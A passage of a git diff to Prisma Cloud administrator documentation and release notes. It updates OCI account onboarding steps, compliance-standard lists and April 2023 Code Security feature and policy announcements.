image::oci-investigate-1.png[scale=40] image::oci-pc-policy-1.png[scale=25] -. *Update an Onboarded OCI Account* +. [[update-oci-onboard]]*Update an Onboarded OCI Account* //RLP-89018 + To update the permissions of an already onboarded OCI account to ingest new APIs or to ingest additional attributes in the OCI API: @@ -210,11 +205,6 @@ To update the permissions of an already onboarded OCI account to ingest new APIs + image::oci-onboard-setup-8.png[scale=40] -.. Edit the downloaded Terraform template to manually add the remaining permissions after receiving the service limit increase on the policy statements. -+ -For the remaining permissions, see https://docs.paloaltonetworks.com/content/dam/techdocs/en_US/pdf/prisma/prisma-cloud/prerelease/oci-permissions.txt#[OCI Permissions]. - - .. Log in to your OCI tenant console. .. Navigate to "Developer Services > Resource Manager > Stacks". @@ -225,7 +215,7 @@ image::update-oci-onboarding-stack-edit.png[scale=40] + [NOTE] ==== -If you are unable to find the stack to Edit, you must delete the existing user, group, and policy from OCI console and perform the steps in Create a User to Enable Access. +If you are unable to find the stack to Edit, you must delete the existing user, group, and policy from OCI console and perform the steps in xref:id5ac2883d-d1ed-44a3-bd63-cc3fabedf477/create-a-user[Create a User to Enable Access]. ==== .. Select "Edit > Edit Stack", upload the updated Terraform template and click *Next*. @@ -236,4 +226,4 @@ If you are unable to find the stack to Edit, you must delete the existing user, .. From the current Job details, navigate to "Resources > Outputs", copy user_ocid, and add it to Prisma Cloud. + -This will update the policy with the newly added policy statements. \ No newline at end of file +This will update the policy with the newly added policy statements. diff --git a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/oci-apis-ingested-by-prisma-cloud.adoc b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/oci-apis-ingested-by-prisma-cloud.adoc index 9eb84b663..75b68fc04 100644 --- a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/oci-apis-ingested-by-prisma-cloud.adoc +++ b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/oci-apis-ingested-by-prisma-cloud.adoc @@ -3,9 +3,17 @@ List of all the OCI APIs and their permissions that Prisma Cloud supports for your OCI-related resources. +[NOTE] +==== +It is recommended that you update your existing Terraform template to support the new permissions. This new Terraform template update eliminates the need to contact OCI to request a service limit extension for the policy statements. +==== + //The source file is https://drive.google.com/drive/folders/166udI14uUm2Q7r9AhtL6vRkEYwqZAkKN + [format=csv, options="header"] |=== include::https://docs.google.com/spreadsheets/d/16CfiUwf82IYfCg-RIVhN5y0hpNgglgduHbnXLogvUZ8/pub?output=csv&gid=821695257[] + + |=== \ No newline at end of file diff --git a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/permissions-required-for-oci-tenant-on-prisma-cloud.adoc b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/permissions-required-for-oci-tenant-on-prisma-cloud.adoc index a93e7ab0e..d1ab24e86 100644 --- a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/permissions-required-for-oci-tenant-on-prisma-cloud.adoc +++ b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/permissions-required-for-oci-tenant-on-prisma-cloud.adoc @@ -8,7 +8,7 @@ Prisma Cloud uses the Terraform file to create a group and add a user to the gro [NOTE] ==== -OCI has a limit of 50 policy statements. However, Prisma Cloud supports more than 100 policy statements. The Terraform file will include only 56 policy statements, and you must add the remaining permissions manually to the file. To successfully ingest the remaining OCI APIs, request a https://docs.oracle.com/en-us/iaas/Content/General/Concepts/servicelimits.htm#[service limit increase] on the policy statements before running the Terraform file. This change affects monthly or annual universal credits OCI accounts and pay-as-you-go or promotional OCI accounts. +OCI has a limit of 50 policy statements that can be added to a single IAM policy, but Prisma Cloud supports over 100 policy statements. To successfully ingest all of the OCI APIs, you do not need to request a https://docs.oracle.com/en-us/iaas/Content/General/Concepts/servicelimits.htm#[service limit increase] from OCI on the policy statements. However, you must update your existing Terraform file as outlined in Step 7 in xref:../../connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/add-oci-tenant-to-prisma-cloud.adoc[Update an Onboarded OCI Account]. ==== diff --git a/cspm/admin-guide/get-started-with-prisma-cloud/access-prisma-cloud.adoc b/cspm/admin-guide/get-started-with-prisma-cloud/access-prisma-cloud.adoc index 5b444888b..d4093c79a 100644 --- a/cspm/admin-guide/get-started-with-prisma-cloud/access-prisma-cloud.adoc +++ b/cspm/admin-guide/get-started-with-prisma-cloud/access-prisma-cloud.adoc @@ -18,7 +18,7 @@ If you are using a third-party IdP and the login URL is configured on Prisma Clo [.procedure] . Launch a web browser to access Prisma Cloud. + -Go to the Pal o Alto Networks https://apps.paloaltonetworks.com[hub] to access the app. To access the Prisma Cloud administrator console, Chrome version 72 or later provides the optimal user experience. The Prisma Cloud console is not explicitly tested on other browsers and, though we expect it to perform with graceful degradation, it is not guaranteed to work on other browsers. +Go to the Palo Alto Networks https://apps.paloaltonetworks.com[hub] to access the app. To access the Prisma Cloud administrator console, Chrome version 72 or later provides the optimal user experience. The Prisma Cloud console is not explicitly tested on other browsers and, though we expect it to perform with graceful degradation, it is not guaranteed to work on other browsers. + image::prisma-cloud-on-hub.png[scale=60] + diff --git a/cspm/admin-guide/get-started-with-prisma-cloud/prisma-cloud-licenses.adoc b/cspm/admin-guide/get-started-with-prisma-cloud/prisma-cloud-licenses.adoc index 0b339970f..37cae0da1 100644 --- a/cspm/admin-guide/get-started-with-prisma-cloud/prisma-cloud-licenses.adoc +++ b/cspm/admin-guide/get-started-with-prisma-cloud/prisma-cloud-licenses.adoc @@ -36,6 +36,8 @@ Each of these offerings has a different capacity unit and unit price in Prisma C === License and Consumption Details On the Prisma Cloud administrative console *Settings > Licensing*, you can easily view your active license plan, the average credit consumption trend, and details on how the average credits are being used by cloud type and each cloud account. + +Only resources that are active (or running) count towards Prisma Cloud credit usage. Non-active (or dormant) resources do not count towards credit usage. //You can also request to switch from and into the standard a la carte plan, Runtime Security Foundations, or Runtime Security Advanced plan. image::licensing-fy23.gif[scale=30] diff --git a/cspm/admin-guide/prisma-cloud-compliance/compliance-dashboard.adoc b/cspm/admin-guide/prisma-cloud-compliance/compliance-dashboard.adoc index b5404c8dd..8df09b041 100644 --- a/cspm/admin-guide/prisma-cloud-compliance/compliance-dashboard.adoc +++ b/cspm/admin-guide/prisma-cloud-compliance/compliance-dashboard.adoc @@ -17,23 +17,23 @@ The built-in regulatory compliance standards that Prisma Cloud supports are: |AWS -|APRA CPS 234, Brazilian Data Protection Law (LGPD), CIS AWS 3 Tier Arch v1.0, CCPA 2018, CIS v1.2, CIS v1.3, CIS AWS v.1.4, CSA CCM v3.0.1, CSA CCM v4.0.1, CMMC, GDPR, HITRUST v9.3, HITRUST v9.4.2, HIPAA, ISO 27001:2013, MAS TRM 2021, MITRE ATT&CKv6.3, MITRE ATT&CKv8.2, MPAA Content Protection Best Practice v4.08, Multi-Level Protection Scheme (MLPS) v2.0, NIST 800.53 Rev4, NIST 800-53 Rev5, NIST 800-171 Rev1, NIST SP 800-171 Rev2, NIST SP 800-172, NIST 800-53 Rev5, NIST CSF v1.1, PCI DSS v3.2, PIPEDA, Monetary Authority of Singapore (MAS) Technology Risk Management (TRM), Risk Management in Technology (RMiT), SOC 2, AWS well architected framework, CyberSecurity Law of the People's Republic of China, CIS AWS 3 Tier Arch v1.0, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), New York Department of Financial Services (NYDFS) 23 Codes, Rules and Regulations (Part 500), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), HITRUST CSF v.9.6.0, Korea–Information Security Management System (K-ISMS), FedRAMP Moderate and Low Baselines (800-53 R4), CIS Amazon Web Services Foundations Benchmark (v1.5.0), SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), AWS Foundational Security Best Practices, CSA CCM v.4.0.6, ISO 27002:2022 +|APRA CPS 234, Brazilian Data Protection Law (LGPD), CIS AWS 3 Tier Arch v1.0, CCPA 2018, CIS v1.2, CIS v1.3, CIS AWS v.1.4, CSA CCM v3.0.1, CSA CCM v4.0.1, CMMC, GDPR, HITRUST v9.3, HITRUST v9.4.2, HIPAA, ISO 27001:2013, MAS TRM 2021, MITRE ATT&CKv6.3, MITRE ATT&CKv8.2, MPAA Content Protection Best Practice v4.08, Multi-Level Protection Scheme (MLPS) v2.0, NIST 800.53 Rev4, NIST 800-53 Rev5, NIST 800-171 Rev1, NIST SP 800-171 Rev2, NIST SP 800-172, NIST 800-53 Rev5, NIST CSF v1.1, PCI DSS v3.2, PIPEDA, Monetary Authority of Singapore (MAS) Technology Risk Management (TRM), Risk Management in Technology (RMiT), SOC 2, AWS well architected framework, CyberSecurity Law of the People's Republic of China, CIS AWS 3 Tier Arch v1.0, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), New York Department of Financial Services (NYDFS) 23 Codes, Rules and Regulations (Part 500), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), HITRUST CSF v.9.6.0, Korea–Information Security Management System (K-ISMS), FedRAMP Moderate and Low Baselines (800-53 R4), CIS Amazon Web Services Foundations Benchmark (v1.5.0), SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), AWS Foundational Security Best Practices, CSA CCM v.4.0.6, ISO 27002:2022, ISO 27001:2022 |Azure -|Azure Security Benchmark (ASB) v2, APRA CPS 234, Brazilian Data Protection Law (LGPD), CCPA 2018, CIS v1.1, CIS v1.2, CIS v1.3, CIS v1.3.1, CIS v1.4.0, CMMC, CSA CCM v3.0.1, CSA CCM v4.0.1, GDPR, HITRUST v9.3, HITRUST v9.4, HIPAA, ISO 27001:2013, MITRE ATT&CKv6.3, MITRE ATT&CKv8.2, MPAA Content Protection Best Practice v4.08, Multi-Level Protection Scheme (MLPS) v2.0, NIST 800.53 R4, NIST 800-53 Rev5, NIST CSF v1.1, NIST SP 800-171 Rev2, NIST SP 800-172, PCI DSS v3.2, PIPEDA, SOC 2, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight< CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), FedRAMP Moderate and Low Baselines (800-53 R4), CIS Microsoft Azure Foundations Benchmark (v1.5.0), SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), CSA CCM v.4.0.6, ISO 27002:2022 +|Azure Security Benchmark (ASB) v2, Azure Security Benchmark (ASB) v3, APRA CPS 234, Brazilian Data Protection Law (LGPD), CCPA 2018, CIS v1.1, CIS v1.2, CIS v1.3, CIS v1.3.1, CIS v1.4.0, CMMC, CSA CCM v3.0.1, CSA CCM v4.0.1, GDPR, HITRUST v9.3, HITRUST v9.4, HIPAA, ISO 27001:2013, MITRE ATT&CKv6.3, MITRE ATT&CKv8.2, MPAA Content Protection Best Practice v4.08, Multi-Level Protection Scheme (MLPS) v2.0, NIST 800.53 R4, NIST 800-53 Rev5, NIST CSF v1.1, NIST SP 800-171 Rev2, NIST SP 800-172, PCI DSS v3.2, PIPEDA, SOC 2, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight< CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), FedRAMP Moderate and Low Baselines (800-53 R4), CIS Microsoft Azure Foundations Benchmark (v1.5.0), SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), CSA CCM v.4.0.6, ISO 27002:2022, ISO 27001:2022 |GCP -|APRA CPS 234, Brazilian Data Protection Law (LGPD), CCPA 2018, CIS v1.0, CIS v.1.1, CIS v.1.2, CIS GKE v1.1, CSA CCM v3.0.1, CSA CCM v4.0.1, CMMC, GDPR, HITRUST v9.3, HITRUST v9.4, HIPAA, ISO 27001:2013, MITRE ATT&CKv6.3, MITRE ATT&CKv8.2, MPAA Content Protection Best Practice v4.08, NIST 800.53 R4, NIST 800-53 Rev5, NIST CSF v1.1, NIST SP 800-171 Rev2, NIST SP 800-172, PCI DSS v3.2, PIPEDA, SOC 2, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), CIS Google Cloud Platform Foundation Benchmark v1.3.0, CIS Google Kubernetes Engine (GKE) v1.2.0 and v1.3.0, FedRAMP Moderate and Low Baselines (800-53 R4), SCF 2022.2.1, CIS Google Cloud Platform Foundation Benchmark v2.0.2, CSA CCM v.4.0.6, ISO 27002:2022 +|APRA CPS 234, Brazilian Data Protection Law (LGPD), CCPA 2018, CIS v1.0, CIS v.1.1, CIS v.1.2, CIS GKE v1.1, CSA CCM v3.0.1, CSA CCM v4.0.1, CMMC, GDPR, HITRUST v9.3, HITRUST v9.4, HIPAA, ISO 27001:2013, MITRE ATT&CKv6.3, MITRE ATT&CKv8.2, MPAA Content Protection Best Practice v4.08, NIST 800.53 R4, NIST 800-53 Rev5, NIST CSF v1.1, NIST SP 800-171 Rev2, NIST SP 800-172, PCI DSS v3.2, PIPEDA, SOC 2, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), CIS Google Cloud Platform Foundation Benchmark v1.3.0, CIS Google Kubernetes Engine (GKE) v1.2.0 and v1.3.0, FedRAMP Moderate and Low Baselines (800-53 R4), SCF 2022.2.1, CIS Google Cloud Platform Foundation Benchmark v2.0.2, CSA CCM v.4.0.6, ISO 27002:2022, ISO 27001:2022 |Alibaba -|Brazilian Data Protection Law (LGPD), CIS v1.0.0, CMMC, CSA CCM v4.0.1, HITRUST v9.3, MAS TRM 2021, MPAA Content Protection Best Practice v4.08, Multi-Level Protection Scheme (MLPS) v2.0, MITRE ATT&CKv8.2, NIST 800.53 Rev4, NIST 800-53 Rev5, NIST CSF v1.1, NIST SP 800-171 Rev2, NIST SP 800-172, PCI DSS v3.2, MAS TRM, RMiT, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), FedRAMP Moderate and Low Baselines (800-53 R4), SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), CSA CCM v.4.0.6, ISO 27002:2022 +|Brazilian Data Protection Law (LGPD), CIS v1.0.0, CMMC, CSA CCM v4.0.1, HITRUST v9.3, MAS TRM 2021, MPAA Content Protection Best Practice v4.08, Multi-Level Protection Scheme (MLPS) v2.0, MITRE ATT&CKv8.2, NIST 800.53 Rev4, NIST 800-53 Rev5, NIST CSF v1.1, NIST SP 800-171 Rev2, NIST SP 800-172, PCI DSS v3.2, MAS TRM, RMiT, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), FedRAMP Moderate and Low Baselines (800-53 R4), SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), CSA CCM v.4.0.6, ISO 27002:2022, ISO 27001:2022 |Oracle Cloud Infrastructure -|CIS v1.0, CIS v1.1, CSA CCM v4.0.1, HITRUST v9.4, MITRE ATT&CKv8.2, MPAA Content Protection Best Practice v4.08, NIST SP 800-171 Rev2, NIST SP 800-172, NIST CSF v1.1, PCI DSS v3.2, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), CIS Oracle Cloud Infrastructure Foundations Benchmark v1.2.0, SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), CSA CCM v.4.0.6, ISO 27002:2022 +|CIS v1.0, CIS v1.1, CSA CCM v4.0.1, HITRUST v9.4, MITRE ATT&CKv8.2, MPAA Content Protection Best Practice v4.08, NIST SP 800-171 Rev2, NIST SP 800-172, NIST CSF v1.1, PCI DSS v3.2, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), CIS Oracle Cloud Infrastructure Foundations Benchmark v1.2.0, SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), CSA CCM v.4.0.6, ISO 27002:2022, ISO 27001:2022 |=== To help you easily identify the gaps and measure how you’re doing against the benchmarks defined in the governance and compliance frameworks, the Compliance Dashboard (menu:Compliance[Overview] combines rich visuals with an interactive design. The dashboard results include data for the last full hour. The timestamp on the bottom right corner of the screen indicates when the data was aggregated for the results displayed. diff --git a/cspm/rn/_graphics/aws-hyd-region.png b/cspm/rn/_graphics/aws-hyd-region.png new file mode 100644 index 000000000..187c3fffb Binary files /dev/null and b/cspm/rn/_graphics/aws-hyd-region.png differ diff --git a/cspm/rn/_graphics/codesec-rn-23.4.1-2.png b/cspm/rn/_graphics/codesec-rn-23.4.1-2.png new file mode 100644 index 000000000..6985950a7 Binary files /dev/null and b/cspm/rn/_graphics/codesec-rn-23.4.1-2.png differ diff --git a/cspm/rn/_graphics/codesec-rn-23.4.1.png b/cspm/rn/_graphics/codesec-rn-23.4.1.png new file mode 100644 index 000000000..248c3d4b9 Binary files /dev/null and b/cspm/rn/_graphics/codesec-rn-23.4.1.png differ diff --git a/cspm/rn/_graphics/rn-cwp-42899.png b/cspm/rn/_graphics/rn-cwp-42899.png new file mode 100644 index 000000000..70267c987 Binary files /dev/null and b/cspm/rn/_graphics/rn-cwp-42899.png differ diff --git a/cspm/rn/_graphics/rn-cwp-44858.png b/cspm/rn/_graphics/rn-cwp-44858.png new file mode 100644 index 000000000..2815db60b Binary files /dev/null and b/cspm/rn/_graphics/rn-cwp-44858.png differ diff --git a/cspm/rn/book.yml b/cspm/rn/book.yml index ef1b3703d..40029f694 100644 --- a/cspm/rn/book.yml +++ b/cspm/rn/book.yml @@ -22,6 +22,8 @@ topics: topics: - name: Features Introduced in 2023 file: features-introduced-in-2023.adoc + - name: Features Introduced in April 2023 + file: features-introduced-in-april-2023.adoc - name: Features Introduced in March 2023 file: features-introduced-in-march-2023.adoc - name: Features Introduced in February 2023 @@ -139,6 +141,8 @@ topics: topics: - name: Features Introduced in 2023—Code Security file: features-introduced-in-code-security-2023.adoc + - name: Features Introduced in April 2023 + file: features-introduced-in-code-security-april-2023.adoc - name: Features Introduced in March 2023 file: features-introduced-in-code-security-march-2023.adoc - name: Features Introduced in February 2023 diff --git a/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-2023.adoc b/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-2023.adoc index 013b79e53..c432632d6 100644 --- a/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-2023.adoc +++ b/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-2023.adoc @@ -5,6 +5,7 @@ Stay informed on the new capabilities and policies added to Prisma Cloud Code Se The following topic provides a snapshot of new features introduced for Code Security on Prisma Cloud. +* xref:features-introduced-in-code-security-april-2023.adoc[Features Introduced in April 2023] * xref:features-introduced-in-code-security-march-2023.adoc[Features Introduced in March 2023] * xref:features-introduced-in-code-security-february-2023.adoc[Features Introduced in February 2023] * xref:features-introduced-in-code-security-january-2023.adoc[Features Introduced in January 2023] diff --git a/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-april-2023.adoc b/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-april-2023.adoc new file mode 100644 index 000000000..294119344 --- /dev/null +++ b/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-april-2023.adoc @@ -0,0 +1,33 @@ +== Features Introduced in April 2023 + +Learn about the new Code Security capabilities on Prisma™ Cloud Enterprise Edition (SaaS) in April 2023. + +The following new features or enhancements are available for Prisma Cloud Code Security. These capabilities help agile teams add security checks to their existing IaC (Infrastructure-as-Code) model and enforce security throughout the build lifecycle. + +* <> +//* <> +//* <> + + +[#new-features] +=== New Features + +[cols="50%a,50%a"] +|=== +|FEATURE +|DESCRIPTION + +|*Validate Secrets during a Secrets scan* +|When Prisma Cloud performs a https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin-code-security/scan-monitor/secrets-scanning[secrets scan], it can now validate certain secrets against public APIs to see if the secret is still active. This allows you to prioritize notifications on secret exposure. +Validation is off by default, but you can enable it "Settings > Code Security Configuration > Validate Secrets". +You can access information on validation of secrets on *Projects > Secrets*, using *Resource Explorer* where prioritization of a valid secret is either to *Suppress* it or perform a *Manual Fix*. Alternatively you can run Checkov on your repositories to filter potentially exposed secrets. + +image::codesec-rn-23.4.1.png[scale=40] + +|*Multiple Integrations support from a single Prisma Cloud account on Terraform Cloud and Enterprise Run Task* +|Prisma Cloud now supports multiple integrations for Terraform Cloud Run Task and Terraform Enterprise Run Task organization from a single Prisma Cloud account. + +image::codesec-rn-23.4.1-2.png[scale=40] +|=== + + diff --git a/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-march-2023.adoc b/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-march-2023.adoc index b678619f0..fd761f57e 100644 --- a/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-march-2023.adoc +++ b/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-march-2023.adoc @@ -5,6 +5,7 @@ Learn about the new Code Security capabilities on Prisma™ Cloud Enterprise Edi The following new features or enhancements are available for Prisma Cloud Code Security. These capabilities help agile teams add security checks to their existing IaC (Infrastructure-as-Code) model and enforce security throughout the build lifecycle. * <> +* <> [#new-features] @@ -36,4 +37,43 @@ Here are the kind of actions you can track. image::codesec-rn-2-23.3.1.png[scale=40] -|=== \ No newline at end of file +|=== + +[#policy-updates] +=== Policy Updates + +[cols="50%a,50%a"] +|=== +|POLICY UPDATES +|DESCRIPTION + +|*AWS EBS volume region with encryption is disabled* + +|*Changes-* The Build remediation instructions are being updated. + +*Impact-* No impact on Code Security findings. + +|*Basic Auth Credentials* + +|*Changes-* The policy name is being updated. + +*Current Policy Name-* Basic Authentication Credentials + +*Impact-* No impact on Code Security findings. + +2+|*Policy Deletions* + +|*AWS EC2 instance is not configured with VPC* + +|*Changes-* This policy is deleted because resources are configured in VPC by default. + +*Impact-* Code Security findings for this policy will no longer be surfaced in scans. + +|*My SQL server enables public network access (duplication of CKV_AZURE_53)* + +|*Changes-* This policy is a duplication of an existing policy, therefore will be deleted. + +*Impact-* Code Security findings for this policy will no longer be surfaced in scans. + +|=== + diff --git a/cspm/rn/prisma-cloud-code-security-release-information/look-ahead-planned-updates-prisma-cloud-code-security.adoc b/cspm/rn/prisma-cloud-code-security-release-information/look-ahead-planned-updates-prisma-cloud-code-security.adoc index f4ed051df..4fd8c82de 100644 --- a/cspm/rn/prisma-cloud-code-security-release-information/look-ahead-planned-updates-prisma-cloud-code-security.adoc +++ b/cspm/rn/prisma-cloud-code-security-release-information/look-ahead-planned-updates-prisma-cloud-code-security.adoc @@ -1,14 +1,14 @@ == Look Ahead—Planned Updates on Prisma Cloud Code Security -Review any deprecation notices and policy changes planned in the next Prisma Cloud Code Security release. +//Review any deprecation notices and policy changes planned in the next Prisma Cloud Code Security release. Read this section to learn about what is planned in the upcoming release. The Look Ahead announcements are for an upcoming or next release and it is not a cumulative list of all announcements. NOTE: The details and functionality listed below are a preview and the actual release date is subject to change. -// * <> -* <> +* <> +//* <> // [#changes-in-existing-behavior] // === Changes in Existing Behavior @@ -23,56 +23,17 @@ NOTE: The details and functionality listed below are a preview and the actual re // | // |=== -[#new-policies] -=== New Policies and Policy Updates - -Learn about the new policies and upcoming policy changes for new and existing Prisma Cloud System policies. +[#changes-in-existing-behavior] +=== Changes in Existing Behavior [cols="50%a,50%a"] |=== -|POLICY UPDATES +|FEATURE |DESCRIPTION +//RLP- 97674 +|*CycloneDX XML Output Format Update* -|*AWS EBS volume region with encryption is disabled* - -|*Changes-* The Build remediation instructions are being updated. - -*Impact-* No impact on Code Security findings. - -|*Basic Auth Credentials* - -|*Changes-* The policy name is being updated. - -*Current Policy Name-* Basic Authentication Credentials - -*Impact-* No impact on Code Security findings. - -|*GitHub VCS Integration* - -|To help ensure that your GitHub organization and repository and GitLab repository configurations are using proper branch protection and build integrity guidelines, Prisma Cloud is adding Build Integrity policies in the upcoming release. These permissions are required to pull organization and repository configurations and scan them for Supply Chain policy violations. -The following additional read-only permissions are being requested: - -* administration: read-only -* actions: read-only -* repository_hooks: read-only -* organization_hooks: read-only - -*Impact-* If you opt to reject or ignore the request for the additional permissions, there will be no impact on existing scans; however, you will not be able to detect violations of the build integrity policies. - - -2+|*Policy Deletions* - -|*AWS EC2 instance is not configured with VPC* - -|*Changes-* This policy is deleted because resources are configured in VPC by default. - -*Impact-* Code Security findings for this policy will no longer be surfaced in scans. - -|*My SQL server enables public network access (duplication of CKV_AZURE_53)* - -|*Changes-* This policy is a duplication of an existing policy, therefore will be deleted. - -*Impact-* Code Security findings for this policy will no longer be surfaced in scans. +|In 23.4.2, the CycloneDX XML output format will be updated to match the Python library updates where all XML tags will be namespaced. This update helps with serialization and deserialization, but it may have some breaking impact with ingesting the SBOM documents. |=== diff --git a/cspm/rn/prisma-cloud-compute-release-information/look-ahead-planned-updates-prisma-cloud-compute.adoc b/cspm/rn/prisma-cloud-compute-release-information/look-ahead-planned-updates-prisma-cloud-compute.adoc index a27b06161..470b599ff 100644 --- a/cspm/rn/prisma-cloud-compute-release-information/look-ahead-planned-updates-prisma-cloud-compute.adoc +++ b/cspm/rn/prisma-cloud-compute-release-information/look-ahead-planned-updates-prisma-cloud-compute.adoc @@ -3,7 +3,120 @@ // Review any deprecation notices and new features planned in the next Prisma Cloud Compute release. -See 